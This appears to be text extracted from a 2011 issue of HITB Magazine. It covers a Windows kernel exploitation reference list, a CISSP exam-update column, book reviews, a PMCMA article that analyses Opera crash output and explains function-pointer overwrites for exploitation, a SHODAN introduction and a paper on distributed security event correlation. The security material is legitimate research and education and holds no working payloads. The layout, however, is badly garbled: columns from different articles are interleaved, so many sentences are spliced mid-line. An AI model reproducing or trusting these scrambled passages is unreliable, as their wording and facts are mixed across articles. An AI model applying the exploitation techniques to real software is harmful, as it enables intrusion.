of-dep-and-aslr.aspx.
7. Matt Miller, MSEC Security Science: Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP. http://blogs.
technet.com/b/srd/archive/2009/02/02/ preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx.
8. Matt Miller, MSEC Security Science: Preventing the exploitation of user mode heap corruption vulnerabilities. http: //blogs.technet.com/b/srd/
archive/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx.
9. Matthew j00ru Jurczyk: nt!NtMapUserPhysicalPages and Kernel StackSpraying Techniques. http://j00ru.vexillium.org/?p=769.
10. Matthew j00ru Jurczyk: Reserve Objects in Windows 7. http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-003.pdf.
11. Matthew j00ru Jurczyk: Subtle information disclosure in WIN32K.SYS syscall return values. http://j00ru.vexillium.org/?p=762.
12. Matthew j00ru Jurczyk: Windows Objects in Kernel Vulnerability Exploitation. http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.
pdf.
13. Matthew j00ru Jurczyk, Gynvael Coldwind: GDT and LDT in Windows kernel vulnerability exploitation. http://vexillium.org/dl.php?call_gate_
exploitation.pdf.
14. Matthew j00ru Jurczyk, Gynvael Coldwind: SMEP: What is it, and how to beat it on Windows. http://j00ru.vexillium.org/?p=783.
15. MSDN: Process Status API. http://msdn.microsoft.com/en-us/library/ms684884%28v=VS.85%29.aspx.
16. MSDN: Windows Objects in Kernel Vulnerability Exploitation. http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf.
17. MSDN Library: Introduction to ERESOURCE Routines. http://msdn.microsoft.com/en-us/library/ff548046%28v=vs.85%29.aspx.
18. Peter Beck: Safe Unlinking in the Kernel Pool. http://blogs.technet.com/b/srd/archive/2009/05/26/safe-unlinking-in-the-kernel-pool.aspx.
19. Peter Beck, MSEC Security Science: Safe Unlinking in the Kernel Pool. http://blogs.technet.com/b/srd/archive/2009/05/26/safe-unlinking-in-the-
kernel-pool.aspx.
20. Ruben Santamarta: Exploiting Common Flaws inDrivers. http://reversemode.com/components/com_remository/com_remository_startdown.php?i
d=51&chk=52afbf0dc821af727c94451e57f03aab&userid=0.
21. skape, Skywing: Bypassing Windows Hardware-enforced DEP. http://www.uninformed.org/?v=2&a=4&t=pdf.
22. Tarjei Mandt: Kernel Attacks Through User-Mode Callbacks. http://mista.nu/research/mandt-win32k-slides.pdf.
23. Tarjei Mandt: Kernel Pool Exploitation on Windows 7. http://www.mista.nu/research/MANDT-kernelpool-PAPER.pdf.
24. Tim Burrell, MSEC Security Science: GS cookie protection eectiveness and limitations. http://blogs.technet.com/b/srd/archive/2009/03/16/gs-
cookie-protection-effectiveness-and-limitations.aspx.
25. Yuriy Bulygin: Remote and Local Exploitation of Network Drivers. http://www.blackhat.com/presentations/bh-usa-07/Bulygin/Whitepaper/bh-usa-
07-bulygin-WP.pdf.
26. Z0mbie: Adding LDT entries in Win2K. http://vxheavens.com/lib/vzo13.html.
CISSP Corner
the latest and greatest security issues being
covered but most of the time the update
would turn out to be only changes in the
domains names, subjects being moved from The introduction page had very little changes
one domain to another, and very minor done. In fact they mostly made it more precise
changes made to the actual content of the and they used words that better represent
Systems Security A grand total of 66 pages alltogether. and some of the key topics that are included
within the CBK. On this page you find that
I have read through this new CIB and most of the changes were made within
Professional (CISSP) compared it with the current one. I will give the description of WHAT IS PROFESSIONAL
you a resume below of my findings and EXPERIENCE.
what is new and in some case what has not There are bullets that were redundant that
changed at all unfortunately. have been combined together.
They replace Creative Writing with
NEW DOMAIN NAMES Professional Writing
There are only two domains that have They changed Applicable titles to say
changes in their names: Applicable Job Titles
Application Development Security will now They remove the title Officer and replaced
be called Software Development Security it with CISO
Operations Security is now called Security They replaced Engineer with Information
Operations Assurance Engineer
Titles such as Leader and Designer have
The new January As you can see those are VERY minor changes been removed
where only one word has been changed and The title Cryptographer is now replacing
2012 CBK has very
for the second domain they simply flip flop Cryptologist and Cryptanalysis
little changes. Your two words. The title Architect was replaced by Cyber
current resources are Architect
still valid and there is You will not be lost with new names for the
no need to buy new domains; they are basically the same except
resources for your for those two changes.
studies. Just keep
using the one you INTRODUCTION PAGE TO THE Candidate
already have. Information Bulletin (CIB)
What are the changes I can expect DOMAIN 1 CHANGES FOR ACCESS CONTROL
The introduction portion was modified to
I cannot believe that between 2009 and now
there was no references added to the list of
with the new Common Body of better describe what falls into this domain.
There is only one new area of knowledge
reference. Either ISC2 has not added any
questions to the CBK using new references or
Knowledge? that was added to this domain with a few the list has not been maintained. Only a few
sub-topics added to old subjects to better of the references are 2010 and most of them
The changes are very minimal. Students will not be describe what they are. are very old.
surprised with a lot of new content. Under Understanding Access Control Attack This does not seem right to me considering
the following sub-bullets were added: that new questions are being added all the
On the right you have an example of such changes for B.1 Threat Modeling time to the exam. I would say Very bizarre...
Domain number 1. B.2 Asset Valuation
B.3 Vulnerability Analysis SAMPLE QUESTIONS (Ouch!)
Please visit http://www.cccure.org/ to read a full B.4 Access Aggregation There are 3 sample questions presented within
the Candidate Information Bulletin. Just like
account of all of the changes for each of the domain. Under Assess Effectiveness of Access the list of references it seems they are getting
Controls the following was added: dated in at least 33.3% percent of them.
The titles of Consultant, Salesman, C.1 User Entitlement
Representative were all removed from the C.2 Access Review & Audit Question number 3 is about the usage of SSL
list of Titles under WAP. The question does not specify
The title of Lecturer was added to the list of A new bullet was added to this domain: which version of WAP.WAP 2.0 was release
applicable titles D. Identify and Access Provisioning lifecycle around 2002, it no longer required a WAP
(e.g. provisioning, review, revocation) gateway. It is amazing to see that this questions
POSITIVE ENFORCEMENT is still being used as an example. The question
In most of the domain the text would The changes in this domain are very minimal. is dated and no longer valid today. Modern
mentioned the candidate should understand Overall changes are by my estimate less than Handset no longer use WAP today.
which has been replaced by is expected 1% of the current CIB content. Mostly there is
which clearly tells the candidate that he has nothing new that was not already covered in This is very disappointing to see this was secret. What good is a CBK if it is kept as a
to know and not only that he should know. the old CBK. there in 2009 almost 7 years after WAP 1.0 secret document?
This is a clear distinction within the text of was no longer use and it is still there today 10
the new CBK. What are ALL of the changes within years after WAP 1.0 is no longer in use. CONCLUSION
the 10 domains of the CBK? This is not what I would call an update. As
This article is restricted by space and cannot I think it is REALLY time to retire this question mentioned above there is at the most 2 to
list ALL of the changes for ALL of the domains and come up with a better sample question. 3% of new material added. I have not seen
of the CBK. You can find a full list of the anything specific to IP Version 6, coverage
changes on the CCCure.Org website at: EXAMINATION INFORMATION of Cloud Computing, Virtualization, DNSSEC,
http://www.cccure.org/article1552.html There is nothing changed within the BGPSEC, Internal threats, Remote Access
examination information. They only changed Trojan, new social engineering techniques,
LIST OF REFERENCES the end time to exam, it used to say 3 PM for skimming, vishing, pharming, and coverage
Something is definitively wrong with the list the CISSP but now they simply state the exam of projects that have all been fielded to
of reference provided for the new CIB. The list will be 6 hours long. They no longer take for improve security.
is a carbon copy of the 2009 list less once book granted that exams all start exactly at 9 AM.
from Doctor McGraw on Software Security. A
Best regards.
book which is by the way still applicable and DISAPPOINTMENT
good for todays issues. The CIB is still lacking as far as details are
concerned. The CIB initially used to have a Clement Dupuis is the
LOT of details about the sub-topics under Chief Learning Officer
(CLO) of SecureNinja.com. The CCCure Family of Portals:
each of the domains subjects. http://www.cccure.org
He is also the founder For the CISSP in becoming and
More details would better guide any and owner of the CCCure other high level certifications
students wanting to become a CISSP. ISC2 family of portals.
http://www.freepracticetests.
should at least as a minimum specific what org/quiz/home.php
percentage of the exam is within each of For more information, please visit
The CCCure FREE quizzer engine
the ten domains. CompTIA does this for http://www.cccure.org or e-mail me (25% of questions are FREE
their certifications. It is not some type of at clement@insyte.us We have 1800 questions for the
CISSP EXAM
Barefoot into
Cyberspace
Adventures in Search of Reviewed by Jonathan Kent
Techno Utopia
T
heres a rule of thumb that the If theres a theme running through the book its the clash over the
more you know, the more you future of the net between governmental and corporate interests on
know you dont know and there the one hand and the idealists who in great measure laid the foundations
are few areas in which its stood me for the net we have today on the other. Starting and finishing her narrative
in better stead than in writing and at successive Chaos Computer Club annual
broadcasting about the hacking
scene. It was something I fell into
congresses in Berlin she touches on a range of
issues such as copyright (and copyleft), personal
And while Ive come to realise how much
as a reporter based in SE Asia. Back
in 2004 I heard on the grapevine
privacy and surveillance, freedom of information,
censorship and the commercial takeover of the
I dont know about the hacking scene Ive
about a hacking conference taking
place in Kuala Lumpur and arranged
net. In and out of this she weaves another story;
that of Wikileaks, whose travails through 2010 she
also become acutely aware of just how
to interview the legendary Captain
Crunch; John Draper. In the early days
watched from a ringside seat.
much complete tosh is written about it by
the HiTB get-togethers were primarily If it has a fault Barefoot into Cyberspace doesnt
a source of good stories, but over the quite manage to tie all its themes together into a the media; even by tech journalists who
years Ive come to look forward to coherent whole. None of the issues that Hogge
catching up with a hugely interesting touches on are covered comprehensively. The really should know better.
collection of people some of whom focus is up close. Much of the book is reportage
have become good friends. rather than a rounded survey of some big topics. However Hogge could
fairly argue that its the most honest way to approach the subject. Anyone,
And while Ive come to realise how particularly any journalist, who claims to have an encompassing overview
much I dont know about the hacking of hacktivism, let alone the wider hacking scene, risks being called out. Im
scene Ive also become acutely aware not persuaded that such a person exists. Hogge simply writes what shes
of just how much complete tosh is seen, recounts the conversations shes had and tries to put them into some
written about it by the media; even kind of context.
by tech journalists who really should
know better. Which is why (former And its the context for which I am most grateful. Her account, much of it centring
ORG Executive Director) Becky Hogges on Stewart Brand, of hackings (and to a great extent the Nets) countercultural
new book Barefoot into Cyberspace roots, is an undertold story that explains their digital duality part hippy
is all the more refreshing and indeed idealism, part alternative, conflicted but voracious entrepreneurialism. And
valuable. Hogge takes us on something frankly anyone who can build the movie Easy Rider into her story, quote
of a personal journey into the world Steppenwolf lyrics and name-check the great Enlightenment radical Tom
of hacktivism in the company of such Paine deserves to be read. Just as Paine grasped the great issues of liberty Edition: July 27, 2011
luminaries as 60s Merry Prankster of his day, Hogge is tackling the great issues of liberty of ours and for anyone Author: Becky Hogge
turned net pioneer Stewart Brand, who cares about our freedoms future this is a must-read.
Publisher: Rebecca Hogge
Dutch hacktivist Rop Gonggrijp, Global http://barefootintocyberspace.com/book/
Voices co-founder Ethan Zuckerman, Pages: 246, Paperback
author Cory Doctorow and Wikileaks ISBN: 978-1-906110-50-5 (print)
frontman Julian Assange.
978-1-906110-51-2 (Kindle)
T N
by David Kennedy, Jim he Metasploit Framework makes discovering, exploiting, and sharing o source code? No problem. With IDA Pro, the interactive disassembler,
OGorman, Devon Kearns, vulnerabilities quick and relatively painless. But while Metasploit is used
by security professionals everywhere, the tool can be hard to grasp for
you live in a source code-optional world. IDA can automatically analyze
the millions of opcodes that make up an executable and present you
and Mati Aharoni first-time users. Metasploit: The Penetration Tester's Guide fills this gap by with a disassembly. But at that point, your work is just beginning. With The IDA
teaching you how to harness the Framework and interact with the vibrant Pro Book, you'll learn how to turn that mountain of mnemonics into something
community of Metasploit contributors. you can actually use.
Once you've built your foundation for penetration testing, youll learn the Hailed by the creator of IDA Pro as "profound, comprehensive, and accurate,"
Framework's conventions, interfaces, and module system as you launch the second edition of The IDA Pro Book covers everything from the very first
simulated attacks. Youll move on to advanced penetration testing techniques, steps to advanced automation techniques. You'll find complete coverage of
including network reconnaissance and enumeration, client-side attacks, IDA's new Qt-based user interface, as well as increased coverage of the IDA
wireless attacks, and targeted social-engineering attacks. debugger, the Bochs debugger, and IDA scripting (especially using IDAPython).
But because humans are still smarter than computers, you'll even learn how to
Edition: July 22, 2011 Learn how to: use IDA's latest interactive and scriptable interfaces to your advantage.
Authors: David Kennedy, Find and exploit unmaintained, misconfigured, and unpatched systems
Jim O'Gorman, Perform reconnaissance and find valuable information about your target Save time and effort as you learn to:
Bypass anti-virus technologies and circumvent security controls Navigate, comment, and modify disassembly
Devon Kearns, Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery Identify known library routines, so you can focus your analysis on other areas Edition: 2nd, July 14, 2011
Mati Aharoni Use the Meterpreter shell to launch further attacks from inside the network of the code Author: Chris Eagle
Harness standalone Metasploit utilities, third-party tools, and plug-ins Use code graphing to quickly make sense of cross references and function calls
Publisher: No Starch Press Learn how to write your own Meterpreter post exploitation modules and scripts Extend IDA to support new processors and filetypes using the SDK Publisher: No Starch Press
Pages: 328, Paperback Explore popular plug-ins that make writing IDA scripts easier, allow Pages: 672, Paperback
You'll even touch on exploit discovery for zero-day research, write a fuzzer, port collaborative reverse engineering, and much more
ISBN: 978-1593272883 existing exploits into the Framework, and learn how to cover your tracks. Whether Use IDA's built-in debugger to tackle hostile and obfuscated code ISBN: 978-1593272890
your goal is to secure your own networks or to put someone else's to the test,
Metasploit: The Penetration Tester's Guide will take you there and beyond. Whether you're analyzing malware, conducting vulnerability research, or
reverse engineering software, a mastery of IDA is crucial to your success.
Editorial Team Take your skills to the next level with this 2nd edition of The IDA
While you can easily get most of the information in this book on the internet, it Pro Book.
is still a good book to be read offline. We are more than happy to recommend
this book to beginners and people who are new to Metasploit, but not for Editorial Team
those who have been using this framework on daily basis. We have a copy of the first edition and the second
edition has plenty of updates to cover the new features in
Rating IDA Pro 6.1. If you are serious about mastering IDA Pro, this
is the only book that you need.
Rating
S
ay you've been fuzzing a given application,
possibly yours, for a few days. You are now left with
a bunch of fuzz files that can trigger bugs inside
the application. Now what? Send all this data to
the vendor (or fix them yourself )? They probably won't
even care. What you need to do now is determine which
of those bugs are exploitable, with which probability, and
then write proper PoCs to demonstrate your claims.
BeyonD
Exploitation is hard: overview of software
security counter measures
Welcome in 2011: most operating systems now feature
non executable memory pages either via software
emulation (PaX and its derivatives) or hardware based
(Intel NX bit). Most OSes actually enforce X^W meaning
that you can't execute writable data: the good old days of
Fuzzing
putting shellcode in the stack or heaps are over.
Exploit
classes of vulnerabilities such as simple double free().
Automation
toolchains have been enhanced to reorganize binary
sections so that writable data sections, potentially subject
to overflows, are not followed by critical sections (such
as the Global Offset Table under GNU/Linux). Even the
dynamic linking process has been enhanced to minimize
attack surface by allowing relocations to be performed at
with PMCMA
load time, and subsequently remapping the GOT as read
only. Hence preventing its malicious hijacking entirely.
In the rest of this article, we will focus on the x86 GNU/ ./pmcma --fptr --segfault -C `which opera` / The human readable analysis is pretty self explanatory: PTR [esi+0x4]) with 2 operands, of which the second one
Linux architecture. PMCMA is also constantly being tmp/repro.html the faulting instruction didn't corrupt the stack, but is being dereferenced.
ported to new architectures, please visit http://www. Opera generated a Segmentation Fault when executing a
pmcma.org for more details. The actual distribution used Here is an output of the analysis automatically generated mov instruction in write mode, potentially allowing an ** The pointer dereference is failing because the register
to perform the tests in this article is a x86 Ubuntu version by Pmcma: attacker to modify the flow of execution. esi, worthing 0x00000031 at this time, is pointing to
10.10, but Pmcma runs on x86_64 cpus too, and Arch unmapped memory.
Linux, Debian, Gentoo and Fedora distrubutions have --=[ Exploitation analysis performed by This analysis took only a few seconds and contains as
been used successfully with it. PMCMA ]=-- much information as you would normally read from an ** The impact of this bug is potentially to perform
1.0 // http://www.pmcma.org
(...) advisory ! a controled read operation, leading either to direct
Introducing PMCMA information leakage (of an interresting value, or more
PMCMA stands for Post Memory Corruption Memory In order to turn such a PoC into a working exploit, a generally of the mapping of the binary), or indirectly to
Analysis. In a nutshell, it is a new type of ptrace() based --[ Command line: shortcoming exists : since we can overwrite some data an other memory corruption bug.
debugger we presented at the latest Blackhat US /usr/lib/opera/opera /tmp/repro.html inside the address space (a few trials and errors quickly
Conference. PMCMA is free software. It is available at --[ Pid: ensures that we can in fact write anywhere in the address Here, the impact of the bug is much lower since it is
http://www.pmcma.org/ under the Apache 2.0 license. 11112 space), the idea would be to find a function pointer called essentially a null pointer dereference in read mode :
after this point by the process, and overwrite (or truncate) even if he controlled esi entirely, all an attacker could do
Unlike standards debuggers, build by software maintainers --[ Stopped at: it to execute arbitrary code. is assign a value to register eax. In most cases, this is not
to help manually fix software, PMCMA is an offensive one, mov dword ptr [ebx+edx], eax interesting, unless eax plays a special role in the assembly
designed with automation and exploitation in mind. --[ Registers: To balance this example of a potentially exploitable bug, instructions executed right after this one.
eax=0x00000000 let's have a look at an other analysis, performed on a non
The core novelty of PMCMA is to allow a debugged ebx=0x77838ff8 exploitable bug : A first possible usage of Pmcma is therefore to determine
process to be replicated at will in memory by forcing it ecx=0x0000001d quickly if a given Segmentation Faulr is of any interest
to fork. By creating many replicas of the same process, it edx=0x00000008 --=[ Exploitation analysis security wise. This is indeed useful for software maintainers
esi=0x5d1d4ff8 performed by PMCMA ]=--
allows for easy empirical automation and manipulation. edi=0x00368084 as well as computer hackers in general.
1.0 // http://www.pmcma.
For instance, it can be used to overwrite sequentially all esp=0xbfeac3ac org
writable sections of memory with a remarkable value ebp=0xbfeac3b8 Function pointers overwrite
after a memory corruption bug has occurred inside eip=0x080baceb --[ Command line: Finding function pointers inside the address space
the address space, and artificially continue execution. /usr/lib/opera/opera /tmp/repro2.html of a process is a complex operation. We could try to
--[ Walking stack:
This is the best known way to determine all the --> Stack was likely not corrupted (43 disassemble the application including all its libraries and
--[ Pid:
function pointers actually called within a binary path. valid frames found) 8172 look for explicit instructions such as :
Without the need of lengthy single stepping. And fully
automatically. --[ Instruction analysis: --[ Stopped at: call eax
--> write operation mov ebx,DWORD PTR [esi+0x4]
--> (2 operands) reg1:edx=0x00000008,reg2:e
Determining exploitability with PMCMA ax=0x00000000 --[ Registers:
This would certainly give us a list of some function
When they are not caught by security checks withing the --> the first operand is dereferenced eax=0xffffffff pointers inside the address space. But, we don't want to
heap allocator or stack cookie integrity checks, most bugs ebx=0x00000031 overwrite just about any function pointer: it has to be one
eventually trigger an invalid memory access resulting in a --[ Crash analysis: ecx=0xbf9f3e78 actually called during the execution of Opera given the
Segmentation Fault (Signal 11). edx=0x00000000 PoC we give it as an input.
** The application received a (SIGSEGV) signal (number esi=0x00000031
edi=0x0a5badd0
There are three types of invalid memory accesses 11), while performing an instruction (mov dword ptr esp=0xbf9fa2b0 A second idea would be to single step execution until we
depending no the faulting assembly instruction triggering [ebx+edx], eax) with 2 operands, of which the first one ebp=0xbf9f42c8 find a suitable function pointer. In this case, given the size
this access (read mode, write mode or execution mode). is being dereferenced. eip=0x0805a7db of the application, it is clearly unpractical!
Determining why an application generated an invalid ** The pointer dereference is failing because the register --[ Walking stack: This is where Pmcma really becomes handy : it is capable
--> Stack was likely not corrupted (19
memory access at assembly level is the first step towards edx, worthing 0x00000008 at this time, is pointing to valid frames found) of listing all the function pointers executed after a given
exploitation. unmapped memory. point in time, in all of the binary (including its shared
--[ Instruction analysis: library). In this case, the full analysis of Opera with Pmcma
Let's use CVE-2011-1824 as an example. It is a vulnerability ** The impact of this bug is potentially to modify the --> not a write operation takes a few hours.
in the Opera web browser we responsibly disclosed earlier control flow. --> (2 operands) reg1:ebx=0x00000031
,reg2:esi=0x00000031
this year1. --> the second operand is dereferenced Listing function pointers
** It is also worth mention that if register eax can only CVE-2010-4344 is a heap overflow in Exim2. This bug is
In order to determine what happens at binary level when worth 0x00000000 exploitation will be harder (but not --[ Crash analysis: interesting for many reasons, in particular because it has
triggering the vulnerability, let's execute Opera inside a necessarily impossible, due to possible unaligned pointer been found exploited in the wild in 2010 while it had in
pmcma session. This can be done with a command line truncations, or by overwriting other data and triggering ** The application received a (SIGSEGV) signal (number fact been reported in 2008.
such as: an other memory corruption indirectly). 11), while performing an instruction (mov ebx,DWORD
Intrusion
as a Service Using
S
HODAN (Sentient Hyper-Optimized Data Access Application Developer and an Entrepreneur. Recently
Network) - the search engine (http://www. SHODAN became hugely popular among pen testers,
shodanhq.com/) is another step towards providing hackers, crackers, security experts, and end users. This is
Intrusion as a Service (IaaS) to general public for because the search engine has indexed a vast internet
free. This service can especially be used by penetration space for six significant TCP/IP ports - HTTP (80), Telnet
testers, information security experts and crackers for (23), FTP (21), SSH (22), SNMP (161), SIP (5060) and it
gathering valuable technical information about a network. displays critical network banners which are associated
SHODAN provides a platform for black hat hackers to with these ports in plain text format as search results.
take over someones system and can be used by security
experts to protect their vulnerable systems. The difference Reading Banners
between search engines like Google, Yahoo or Bing and Before getting started with SHODAN, it is important to
SHODAN is that its spider crawlers displays the network understand different sections of the banners that are
banners from its database of indexed websites while other displayed for optimizing search results. Usually the
search engines just displays a websites content. banners that are displayed as search results in SHODAN
engine that allows you to SHODAN is a computer search engine that allows you to
search Servers, Routers, IP Addresses, Software and almost
header fields and all the important information like
server name, date modified and others are broken
search Servers, Routers, IP anything that is connected to the internet. It is mostly free
and open for public and it has been developed by John
down into these header fields. Refer Table 1 which will
give you a quick knowledge about different header
Addresses, Software and Matherly (http://twitter.com/achillean) who is a Serial Web fields involved and their meanings.
Using SHODAN
almost anything that is The look and the feel of SHODAN is just like any other
connected to the internet. search engine. Just like Google, SHODAN too utilizes
Boolean operators such as +, - and | for including and
Studies on
Distributed
Security Event
Analysis
in Cloud
Fyodor Yarochkin, Department of Electrical
Engineering, National Taiwan University
Introduction node system, our primary focus is to network asset knowledge base Figure 2. Querying by class attribute in Riak
In this research our primary focus design the algorithms suitable to be in order to assign risk metrics to
is designing a set of distributed executed in parallel on a distributed identified events.
algorithms for network security computational platform, also often
event evaluation, correlation and referred to as cloud. Our implementation of correlation
identification of the events that engine is build on the top of Erlang
may signify network security breach Further, many existing works in the distributed system/VM and heavily
incidents. Typically the main challenge field of network event correlation and utilizes functional programming
of network event processing is attack reconstruction have difficulty paradigm and Erlang Actor model for
creation of unified vision of the analyzing and using semantic context concurrent processing.
network events, fusing together the of network events. As the solution to
data from heterogeneous sources3 this problem, the researchers either System Architecture and
and determining, which events may utilize pre-configurable pattern Correlation Process
have significant impact on security matchers, which are able to identify In our approach we have designed
of the network infrastructure. Such known events and convert them into a dynamically constructed ontology
process of alert fusion is typically a form, suitable for computation, of event semantic forms (tags) and
refereed as event correlation process. or they relay only on quantifiable in the process of network event of the nodes within the ontology Figure 3. Implementation Diagram
parameters of a network event (such data normalization we use natural tree. For example an ssh failed login
Network intrusion detection sensors, as IP address, port number, packet language processing techniques attempt could be associated with
host intrusion detection sensors, size, time stamp and so on). Both (NLP) to map processed events ssh, login attempt: failed, which
network hardware equipment approaches have serious drawbacks to our ontology tree. This gives sufficiently extends set of metrics,
unix syslog logs - all of this data is in the design: either the pattern us possibility of being able to used in event clustering process by4.
the source of raw network event matchers need to be maintained in successfully analyze and cross-
data. However in any sufficiently synchrony with event generating correlate events without use of pre- Figure 3 denotes over-all architecture
complicated network, the volume devices to be able to recognize the configured pattern matchers. This is of designed system. Raw network
of raw network data is extremely majority of produced events, which in an enormous advantage due to the event data is being collected and
large and not only impossible for heterogeneous network environment fact that network sensors, intrusion normalized using a set of distributed
human analysis, but is also often not is quite difficult task, or the correlation detection systems can be updated network agents. Normalized data is
suitable for automated processing on process misses significant portion of independently with new signatures being collected by one of correlation
single-host computational system. information that could be extracted without need to propagate the process components, which perform
Therefore it is essential to design the from event semantics. changes to the correlation engine. raw network event clustering
event correlation and aggregation This is especially true in distributed cross-semantical correlation and
algorithm in a fashion, suitable for Our main contribution of this work computation platform. risk mapping (based on calculated
distributed parallel computing. is ability not only to use statistical threat and asset value). Network
algorithms to cluster network events The ontology tree is a hierarchical asset knowledge base contains
While most of the research work in as demonsrated in4, but also be able semantical map of protocols, basic information about protected
this area is focused on actual data to use semantical context of the applications, and events and their network (network hosts, services,
mining and correlation algorithms, network events in correlation process characteristics). Every network event detected operating system and
designed to be run on a single and perform cross-correlation with could be associated with at least one so on) and is periodically updated
using automated network discovery
Figure 1. Log Agent code snippet process.
Riak platform (developed by Basho Most of these algorithms however window. Each of the correlation Figure 5. Raw Event Distribution A threshold-based filtering
Technologies). are designed to be executed on processes will attempt to identify mechanism is applied to the each
centralized computer platforms2, other similar events via messaging of the chunks and only chunks with
Riak is a key value storage system, and thus are not suitable for communication protocol with other sufficient probability of attack or
which, however, also allows secondary distributed computation. We correlation peers. compromise score are preserved
indexing, and object linking that we attempt to develop a distributed and shown to the human user of the
use for cluster attribution. The unique data clustering algorithm that takes The correlation process clusters system. The remaining chunks are
feature of riak is also that it allows normalized and ontology mapped normalized event data into relevant discarded.
to perform further data processing network event data as input and chunks, or clusters, where each
using map-reduce queries. A typical produces set of features that are individual event may belong to Preliminary Results
problem of map-reduce computation used to map each raw event data to more than a single chunk at any We conducted experimental
on such platforms as Hadoop is data a cluster chunk. time. Further, the correlation testing of developed system in
locality. The way map-reduce support process calculates the potential risk the environment that consists of a
is implemented on riak platform, In order to map the event data to metrics (probability of attack and number of event receiving agents
resolves the data locality issue by clusters based on the event property compromise) of each particular (three were used in this experiment),
executing map functions on the similarity, each of the correlation chunk, using the network asset which collected unix system logs,
nodes of the storage cluster, where process needs to be able to knowledge base, which is basically a network intrusion detection system
the data is located, the results of map communicate with other processes database of known machines within logs (snort) and output from several
function are passed to the requesting that perform clustering. We achieve the network, with set of services and other passive network monitoring
node, which computes reduce this with simple messaging protocol software running on these systems. tools (arpwatch, p0f, ntop). Raw
function as new data appears. on the top of Erlang process The KB also provides asset value network events, once normalized at
infrastructure. During the correlation characteristics to each of the known event collecting agents, are passed
The real-time data clustering process the time is divided into systems, which is set automatically, to correlation processes, where event
algorithms have been widely intervals of the fixed length. We but could be manually modified by unification and risk mapping takes
researched and investigated1. refer to these intervals as clustering system administrator. place. Raw and correlated events are
Figure 6. Correlated Network Events stored in separate tables for human
Figure 4. Raw Network Events analysis. Figure 4 depicts the set of
raw network events, collected during
a period of 2 weeks on a selected
network segment. Figure 6 depicts
the correlated event data within
the same segment. The reduction
in event complexity is obvious. The
different edge color signifies different
risk metric, as it was assigned by
correlation process.
Future Research
Distributed approach to network
event correlation for intrusion and
malicious activity detection is an
interesting and unexplored area.
HITB Magazine is currently seeking submissions for our next issue. If you have
something interesting to write, please drop us an email at:
editorial@hackinthebox.org
>>REFERENCES
1. J. Hann and M. Kamber. Data-Mining Concepts and Techniques. Morgan Kaufmann Publishers, 2001
2. L. G. C. A. X. W. Z. C. Y. Li;. Real time clustering of sensory data in wireless sensor networks. In Performance Computing and Communications
Conference (IPCCC), 2009 IEEE 28th International, 2009.
3. F. Maggi and S. Zanero. On the use of different statistical tests for alert correlation. In RAID Conference Proceedings, 2007.
4. Y.-T. W. Wei-Yu Chen, Wen-Chieh Kuo. Building ids log analysis system on novel grid computing architecture. In CloudSlam 09 Conference
Proceedings, 2009.
5. Riak Documentation: http://wiki.basho.com/
6. RabbitMQ: http://www.rabbitmq.com
7. Natural Language Toolkit: http://www.nltk.org
Tel: +603-20394724
Fax: +603-20318359
Email: media@hackinthebox.org